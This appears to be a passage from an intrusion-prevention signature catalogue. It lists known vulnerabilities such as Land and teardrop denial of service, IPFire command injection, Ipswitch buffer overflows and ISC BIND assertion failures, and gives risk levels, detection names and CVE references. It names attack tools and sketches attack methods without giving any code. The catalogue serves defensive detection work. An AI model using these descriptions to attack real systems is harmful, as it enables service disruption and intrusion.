IP-Land-DoS-Motorola

About this vulnerability: Land Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4257, CVE-2005-4258 , CVE-2005-4275 CVE-2005-4276
Situation: DOS_LAND
References:
CVE-2005-4215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4215
BID-15795
http://www.securityfocus.com/bid/15795
Back to top

IP-Land-DoS-Scientific-Atlanta-Cable-Modem

About this vulnerability: Land Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4215, CVE-2005-4257, CVE-2005-4258 CVE-2005-4276
Situation: DOS_LAND
References:
CVE-2005-4275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4275
BID-15870
http://www.securityfocus.com/bid/15870
Back to top

IP-Land-DoS-Westell-Versalink

About this vulnerability: Land Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4215, CVE-2005-4257, CVE-2005-4258 CVE-2005-4275
Situation: DOS_LAND
References:
CVE-2005-4276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4276
BID-15869
http://www.securityfocus.com/bid/15869
Back to top

IP-Nestea-IP-Fragmentation-Denial-Of-Service

About this vulnerability: Nestea variation of teardrop IP fragmentation denial of service
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: -
Software: <os>
Type: Malfunction
Description: There is a vulnerability in the IP defragmentation routines of certain IP stacks. A remote attacker may exploit this by sending crafted IP fragments. A successful exploit leads to a Denial of Service condition. This vulnerability can be exploited, for example, with tools called "nestea" and "targa".
Situation: DOS_NESTEA
References:
CVE-1999-0257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0257
OSVDB-5729
http://www.osvdb.org/5729
Back to top

IP-Newtear-IP-Fragmentation-Denial-Of-Service

About this vulnerability: Newtear variation of teardrop IP fragmentation denial of service
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: -
Software: <os>
Type: Malfunction
Description: There is a vulnerability in the IP defragmentation routines of certain IP stacks. A remote attacker may exploit this by sending crafted UDP fragments. A successful exploit leads to a Denial of Service condition. This vulnerability can be exploited, for example, with tools called "newtear" and "targa".
Situation: DOS_NEWTEAR
Back to top

IP-Oshare-Bogus-IP-Fragmentation-DoS

About this vulnerability: Malformed IP fragmentation denial of service
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: -
Software: <os>
Type: Malfunction
Description: There is a vulnerability in the IP defragmentation routines of certain IP stacks. A remote attacker may exploit this by sending crafted IP fragments. A successful exploit leads to a Denial of Service condition. This vulnerability can be exploited with tool called "oshare". Unlike many other fragmentation vullnerabilities, this vulnerability cannot be exploited beyond routers. For this reason, it is a local network vulnerability only.
Situation: DOS_OSHARE
References:
CVE-1999-0357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0357
Back to top

IP-Teardrop-DoS

About this vulnerability: Teardrop Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Teardrop exploits a vulnerability in TCP/IP stack implementations. By sending a fragmented IP packet with overlapping fragments, remote attackers can launch a denial-of-service attack.
Situation: DOS_TEARDROP
References:
CVE-1999-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0015
BID-124
http://www.securityfocus.com/bid/124
Back to top

IP-UDP-Saihyousen-Denial-Of-Service

About this vulnerability: Saihyousen Oversized UDP Denial Of Service
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: -
Software: <os>
Type: Malfunction
Description: Some operating systems have a vulnerability in their IP stacks that causes an oversized UDP packet to crash the system. This vulnerability can be exploited, for example, by tools called "conseal", "saihyousen" and "targa".
Situation: DOS_SAIHYOUSEN
Back to top

IPFire-Firewall-Web-Interface-Backup-Cgi-Command-Injection

About this vulnerability: A vulnerability in IPFire Team IPFire
Risk: Moderate
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IPFire
Type: Input Validation
Description: Improper validation of user-supplied requests in the backup.cgi script causes a command injection vulnerability in the IPFire firewall. A successful exploit allows an attacker to run arbitrary commands on the target system as the nobody user.
Situation: HTTP_CRL-IPFire-Firewall-Web-Interface-Backup-Cgi-Command-Injection
References:
CVE-2018-16232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16232
Back to top

IPFire-Pakfire.cgi-Authenticated-RCE

About this vulnerability: A vulnerability in IPFire.
Risk: High
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Generic
Software: IPFire
Type: Input Validation
Description: A vulnerability in IPFire, versions 2.25 Core Update 156 and before, which allows remote attackers to execute arbitrary code by allowing non-root users to modify backup.pl through /cgi-bin/pakfire.cgi.
Situation: HTTP_CRL-IPFire-Pakfire.cgi-Authenticated-RCE
References:
CVE-2021-33393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33393
Back to top

IPFire-Proxy.cgi-RCE

About this vulnerability: An IPFire proxy.cgi RCE vulnerability
Risk: High
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: IPFire
Type: Input Validation
Description: A vulnerability in IPFire, versions before 2.19 Update Core 110, which allows remote attackers to execute arbitrary code through the OINKCODE parameter in the ids.cgi page.
Situation: HTTP_CRL-IPFire-Proxy.cgi-RCE
Back to top

IPFire-Proxy.cgi-Remote-Code-Execution

About this vulnerability: A vulnerability in IPFire
Risk: High
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IPFire
Type: Input Validation
Description: There exists a remote code execution vulnerability in IPFire.
Situation: HTTP_CRL-IPFire-Proxy.cgi-Remote-Code-Execution
Back to top

Ipswitch-IMail-IMAP-Server-Delete-Command-BOF

About this vulnerability: Buffer overflow in Ipswitch IMail IMAP server
Risk: High
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: Ipswitch IMail Server is vulnerable to a stack-based buffer overflow caused by improper bounds checking of user-supplied input in the DELETE command. A remote attacker could use this vulnerability to overflow a buffer and possibly execute arbitrary code on the system.
Situation: IMAP_Excessively-Long-Argument-In-IMAP-Delete-Command-BOF
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Delete-Command
References:
CVE-2004-1520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1520
BID-11675
http://www.securityfocus.com/bid/11675
OSVDB-11838
http://www.osvdb.org/11838
Back to top

Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF

About this vulnerability: Remote buffer overflow vulnerability in the Ipswitch LDAP daemon
Risk: High
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: Ipswitch IMail Server is vulnerable to a buffer overflow in the Lightweight Directory Access Protocol (LDAP) daemon, caused by improper bounds checking of user-supplied input. By supplying a specially-crafted LDAP message containing a large tag, a remote attacker could overflow a buffer to cause the daemon to crash and execute arbitrary code on the system with administrative privileges.
Situation: LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF-2
LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF-3
LDAP_Ipswitch-IMail-LDAP-Daemon-DoS
LDAP_Ipswitch-IMail-LDAP-Daemon-Probe
References:
CVE-2004-0297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0297
BID-9682
http://www.securityfocus.com/bid/9682
OSVDB-3984
http://www.osvdb.org/3984
Back to top

Ipswitch-IMail-List-Mailer-Reply-To-Address-Buffer-Overflow

About this vulnerability: A vulnerability in Ipswitch IMail Server
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IMail
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Ipswitch IMail Server.
Situation: SMTP_CS-Ipswitch-IMail-List-Mailer-Reply-To-Address-Buffer-Overflow
References:
BID-41717
http://www.securityfocus.com/bid/41717
Back to top

Ipswitch-IMail-Server-Imailsec.dll-Heap-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Ipswitch IMail
Risk: High
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: There is a heap overflow vulnerability in Ipswitch IMail Server's IMAP component. The vulnerability is due to a lack of boundary protection within the Imailsec.dll library while processing the IMAP LOGIN command. A remote unauthenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, normally System.
Situation: IMAP_CS-Ipswitch-IMail-Server-Imailsec.dll-Heap-Buffer-Overflow
Back to top

Ipswitch-IMail-Server-IMAP-Examine-BOF

About this vulnerability: Buffer overflow in Ipswitch IMail server IMAP EXAMINE command
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ipswitch Collaboration Suite; IMail
Type: Buffer Overflow
Description: Ipswitch Collaboration Suite (ICS) IMail server contains a buffer overflow vulnerability in the IMAP EXAMINE command handling due to insufficient bounds checking of user supplied data. A remote attacker could create an overly long EXAMINE request to overflow a buffer, thus causing a denial of service and execute arbitrary code on the server.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command
References:
CVE-2005-0707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0707
BID-12780
http://www.securityfocus.com/bid/12780
OSVDB-14657
http://www.osvdb.org/14657
Back to top

Ipswitch-IMail-Server-Mailing-List-Message-Subject-BOF

About this vulnerability: An attempt to exploit vulnerability in Ipswitch iMail Server detected
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Malfunction
Description: There exists a buffer overflow vulnerability in Ipswitch IMail Server. The vulnerability is due a boundary error in the imailsrv.exe which handles messages sent to the imailsrv. The vulnerable code does not properly handle messages that are sent to certain mailing lists and have crafted "Subject" header.
Situation: E-Mail_Ipswitch-IMail-Server-Mailing-List-Message-Subject-BOF
Back to top

Ipswitch-IMail-SMTP-Server-Content-Type-Header-Buffer-Overflow

About this vulnerability: Ipswitch Imail Content-Type Header Bof
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Malfunction
Description: There exists a heap buffer overflow vulnerability in Ipswitch IMail SMTP Server. The vulnerability is due to insufficient boundary check when processing user provided data. Remote attackers could exploit this vulnerability by supplying a specially crafted Content-Type header to the server. Successful exploitation of this vulnerability allows remote attackers execute arbitrary code with the privileges of the affected application, which is normally System.
Situation: E-Mail_Ipswitch-IMail-Server-Content-Type-BOF
References:
CVE-2007-5094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5094
BID-25762
http://www.securityfocus.com/bid/25762
OSVDB-39390
http://www.osvdb.org/39390
Back to top

Ipswitch-IMail-StartTLS-Plaintext-Command-Injection

About this vulnerability: A vulnerability in Ipswitch IMail Server
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IMail
Type: Malfunction
Description: A plain text command injection vulnerability exists in Ipswitch IMail Server.
Situation: SMTP_CS-Ipswitch-IMail-StartTLS-Plaintext-Command-Injection
References:
CVE-2011-0411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0411
BID-46767
http://www.securityfocus.com/bid/46767
OSVDB-71021
http://www.osvdb.org/71021
Back to top

Ipswitch-WhatsUp-Gold-HTTP-Request-DoS

About this vulnerability: A vulnerability in Ipswitch Whatsp Gold
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ipswitch WhatsUp Gold
Type: Input Validation
Description: A vulnerability exists in the way the web server component of Ipswitch WhatsUp Gold processes a request that contains a special device name. An unhandled exception occurs when an HTTP request containing a reserved DOS device name is processed. An attacker exploiting this vulnerability can cause the web server component to terminate, causing a denial of service.
Situation: HTTP_CSU-Ipswitch-WhatsUp-Gold-HTTP-Request-DoS
References:
CVE-2004-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0799
BID-11110
http://www.securityfocus.com/bid/11110
Back to top

Ipswitch-WhatsUp-Gold-SNMP-Trap-Cross-Site-Scripting-CVE-2015-6005

About this vulnerability: An attempt to exploit a vulnerability in IPSwitch WhatsUp Gold detected
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Ipswitch WhatsUp Gold
Type: Input Validation
Description: IPSwitch WhatsUp Gold before 16.4 allow remote attackers to inject arbitrary web script or HTML via (1) an SNMP OID object, (2) an SNMP trap message, (3) the View Names field, (4) the Group Names field, (5) the Flow Monitor Credentials field, (6) the Flow Monitor Threshold Name field, (7) the Task Library Name field, (8) the Task Library Description field, (9) the Policy Library Name field, (10) the Policy Library Description field, (11) the Template Library Name field, (12) the Template Library Description field, (13) the System Script Library Name field, (14) the System Script Library Description field, or (15) the CLI Settings Library Description field.
Situation: SNMP-UDP_Cross-Site-Scripting-Via-SNMP-Trap
References:
CVE-2015-6005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6005
Back to top

Ipswitch-WhatsUp-Gold-TFTP-Directory-Traversal

About this vulnerability: An Ipswitch WhatsUp Gold TFTP Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ipswitch WhatsUp Gold
Type: Directory Traversal
Description: A directory traversal vulnerability in Ipswitch WhatsUp Gold version 1.0.0.24 which allows remote attackers to upload or download arbitrary files.
Situation: TFTP_Ipswitch-WhatsUp-Gold-TFTP-Directory-Traversal
References:
CVE-2011-4722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4722
BID-50890
http://www.securityfocus.com/bid/50890
OSVDB-77455
http://www.osvdb.org/77455
Back to top

Ipswitch-WS_FTP-Client-Format-String-Vulnerability

About this vulnerability: A vulnerability in Ipswitch WS_FTP Home
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WS_FTP Home; WS_FTP Professional
Type: Format String
Description: A format string vulnerability exists in the Ipswitch WS_FTP client FTP product.
Situation: FTP_SS-Ipswitch-WS_FTP-Client-Format-String-Vulnerability
References:
CVE-2008-3734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3734
BID-30720
http://www.securityfocus.com/bid/30720
Back to top

Ipswitch-WS_FTP-Logging-Server-Daemon-Denial-Of-Service

About this vulnerability: A vulnerability in IPSwitch WS_FTP Server
Risk: High
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WS_FTP Server
Type: Malfunction
Description: There exists a denial of service vulnerability in the way WS_FTP Logging Server Daemon handles WS_FTP logging requests. Remote unauthenticated attackers can exploit this vulnerability to cause a denial of service of an affected system. Upon a successful attack, the vulnerable WS_FTP logging server will terminate and exit, creating a denial of service condition. The service needs to be restarted manually to restore the functionality.
Situation: Generic_UDP-Ipswitch-WS_FTP-Logging-Server-Daemon-Denial-Of-Service
References:
CVE-2007-3823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3823
OSVDB-36218
http://www.osvdb.org/36218
Back to top

Ipswitch-WS_FTP-Server-Command-Buffer-Overflow

About this vulnerability: A vulnerability in Ipswitch WS_FTP Server
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WS_FTP Server
Type: Buffer Overflow
Description: A vulnerability exists in the way Ipswitch WS_FTP server parses FTP commands. Specially crafted arguments to certain FTP commands can trigger a buffer overflow. An attacker can exploit this vulnerability to create a denial of service condition or execute arbitrary code with system level privileges.
Situation: FTP_CS-Ipswitch-WS_FTP-Server-Command-Buffer-Overflow
Back to top

ipTime-G104BE-Router-Code-Execution

About this vulnerability: A vulnerability in ipTime G104BE routers
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ipTime G104BE routers
Type: Malfunction
Description: There is a code execution vulnerability in ipTime G104BE routers which may allow a remote attacker to execute code on the router.
Situation: HTTP_CSU-ipTime-G104BE-Router-Code-Execution
Back to top

IPv6-Land-DoS

About this vulnerability: Land Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-4215, CVE-2005-4257, CVE-2005-4258 , CVE-2005-4275 CVE-2005-4276
Situation: DOS_LAND
References:
CVE-2005-1649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1649
BID-13658
http://www.securityfocus.com/bid/13658
Back to top

IPv6-Solaris-Malformed-Packet-DOS

About this vulnerability: Malformed IPv6 cause Solaris to crash
Risk: High
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in the way Sun Microsystems' Solaris handles IPv6 requests. The vulnerability is due to inappropriate calculation when processing malformed IPv6 requests. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted IPv6 packets to an affected system. Successful exploitation may cause the system to crash.
Situation: IPv6_Extension-headers-incomplete
References:
CVE-2009-0304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0304
BID-33435
http://www.securityfocus.com/bid/33435
Back to top

IRC-Itlebot-Malware

About this vulnerability: IRC Itlebot malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: IRC Itlebot is a Windows malware that can be controlled over IRC.
Situation: Generic_CS-IRC-Itlebot-Activity
Back to top

IRC-Network-Usage

About this vulnerability: IRC network usage
Risk: Moderate
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic IRC client
Type: Instant Messenger
Description: The IRC network can be used to send messages and share files among users.
Situation: IM-TCP_IRC-Server-Login
IM-TCP_IRC-Server-Detected
Back to top

IRC-Scan-Activity

About this vulnerability: IRC SCAN Activity
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: There are various IRC-controlled bots that allow remote network scanning.
Situation: Generic_CS-IRC-Scan-Activity
Generic_SS-IRC-Scan-Activity
Back to top

Irfanview-Jpeg2000-Jp2-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Irfanview's JPEG2000.dll plugin
Risk: Moderate
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Irfanview
Type: Malfunction
Description: There exists a stack buffer overflow vulnerability in Irfanview's JPEG2000.dll plugin.
Situation: File-JPEG_Irfanview-Jpeg2000-Jp2-Stack-Buffer-Overflow
References:
CVE-2012-0897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0897
BID-51426
http://www.securityfocus.com/bid/51426
OSVDB-78333
http://www.osvdb.org/78333
Back to top

IRIX-lpsched-Command-Execution

About this vulnerability: An IRIX lpsched Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Irix
Type: Malfunction
Description: A vulnerability in lpsched in Irix, versions 6.5.13f and before, which allows remote attackers to execute arbitrary commands via shell metacharacters.
Situation: Generic_CS-IRIX-lpsched-Command-Execution
References:
CVE-2001-0800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0800
OSVDB-8573
http://www.osvdb.org/8573
Back to top

IRIX-Telnetd-Format-String

About this vulnerability: Irix telnetd format string vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: IRIX
Software: Generic telnet server
Type: Format String
Description: Irix telnet daemon has a format strings vulnerability. This vulnerability is present in unpatched Irix versions of 6.2 through 6.5.8. Successful exploitation of this vulnerability leads to remote root compromise.
Situation: Telnet_IRIX-RLD-Format-String
References:
CVE-2000-0733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0733
BID-1572
http://www.securityfocus.com/bid/1572
Back to top

ISC-Bind-Any-Query-Response-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: A crafted DNS response can be used to trigger an assertion failure in ISC BIND. A successful exploitation can cause a denial of service condition.
Situation: DNS-UDP_ISC-Bind-Any-Query-Response-Assertion-Failure-Denial-Of-Service
References:
CVE-2016-9131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9131
Back to top

ISC-Bind-Apl_42.c-Insist-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Format String
Description: A malformed DNS response can be used to exploit an assertion failure vulnerability in the ISC BIND DNS server, leading to a denial of service condition.
Situation: DNS-UDP_ISC-Bind-Apl_42.c-Insist-Assertion-Failure-Denial-Of-Service
References:
CVE-2015-8704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8704
Back to top

ISC-Bind-Buffer.c-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: Malicious queries can result in a denial of service condition in ISC BIND.
Situation: DNS-UDP_ISC-Bind-Buffer.c-Assertion-Failure-Denial-Of-Service
References:
CVE-2016-2776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776
Back to top

ISC-Bind-Buffer.c-Require-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Malfunction
Description: A crafted DNS response can be used to exploit an assertion failure in the ISC BIND DNS server. A successful attempt can lead to a denial of service condition.
Situation: DNS-UDP_ISC-Bind-Buffer.c-Require-Assertion-Failure-Denial-Of-Service
References:
CVE-2015-8705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8705
Back to top

Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: High
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in BIND. The vulnerability is due to improper parsing of incoming responses. Exploiting this vulnerability may lead to a denial-of-service condition.
Situation: DNS-UDP_Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service
DNS-UDP_Isc-Bind-Db.c-Assertion-Failure-DoS
References:
CVE-2015-8000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8000
Back to top

ISC-Bind-Deny-Answer-Aliases-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Malfunction
Description: A denial-of-service vulnerability has been reported in ISC BIND9. The vulnerability is due to improper handling of certain responses when BIND is configured to use the deny-answer-aliases feature. A remote attacker could exploit this vulnerability by providing a specific response to a DNAME or ANY query to a vulnerable BIND server. Successful exploitation leads to denial-of-service conditions.
Situation: DNS-UDP_ISC-Bind-Deny-Answer-Aliases-Assertion-Failure-Denial-Of-Service
References:
CVE-2018-5740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5740
Back to top

ISC-Bind-Dname-Response-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: DNS responses containing a crafted DNAME record in the answer section can be used to cause a denial of service condition in ISC BIND.
Situation: DNS-UDP_ISC-Bind-Dname-Response-Processing-Denial-Of-Service
References:
CVE-2016-8864
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8864
Back to top

ISC-Bind-Dname-RRSIG-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: Improper parsing of DNS RRSIG records can lead to a denial of service condition, which can be triggered by sending a crafted response to a query.
Situation: DNS-UDP_ISC-Bind-Dname-RRSIG-Assertion-Failure-Denial-Of-Service
References:
CVE-2016-1286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1286
Back to top

ISC-Bind-DNS-Cookie-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in ISC BIND9. The vulnerability is due to improperly processing DNS cookies. A remote attacker could exploit this vulnerabilities by sending a maliciously crafted DNS packet to a target BIND server. Successful exploitation could lead to a denial-of-service condition.
Situation: DNS-UDP_ISC-Bind-DNS-Cookie-Assertion-Failure-Denial-Of-Service
References:
CVE-2016-2088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2088
Back to top

ISC-Bind-DNS-Options-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: An assertion failure which can be triggered by sending the server a malicious packet causes a denial of service vulnerability in ISC BIND.
Situation: DNS-UDP_ISC-Bind-DNS-Options-Assertion-Failure-Denial-Of-Service
References:
CVE-2016-2848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2848
Back to top

ISC-BIND-DNS64-And-RPZ-Query-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: There exists a denial of service vulnerability in ISC BIND.
Situation: DNS-UDP_ISC-BIND-DNS64-And-RPZ-Query-Processing-Denial-Of-Service
References:
CVE-2017-3135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3135
Back to top

ISC-BIND-DNSSEC-Key-Parsing-Buffer.c-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: ISC BIND parses some DNSSEC responses incorrectly, which can cause a denial of service condition.
Situation: DNS-UDP_ISC-BIND-DNSSEC-Key-Parsing-Buffer.c-Denial-Of-Service
References:
CVE-2015-5722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722
Back to top

ISC-BIND-DNSSEC-Validation-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: High
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Input Validation
Description: A denial of service vulnerability exists in ISC BIND. The vulnerability is due to an error during DNSSEC validation. A remote attacker can exploit this vulnerability by sending crafted queries under certain circumstances. Successful exploitation will result in a denial of service condition.
Situation: DNS-UDP_ISC-BIND-DNSSEC-Validation-Denial-Of-Service
References:
CVE-2015-4620
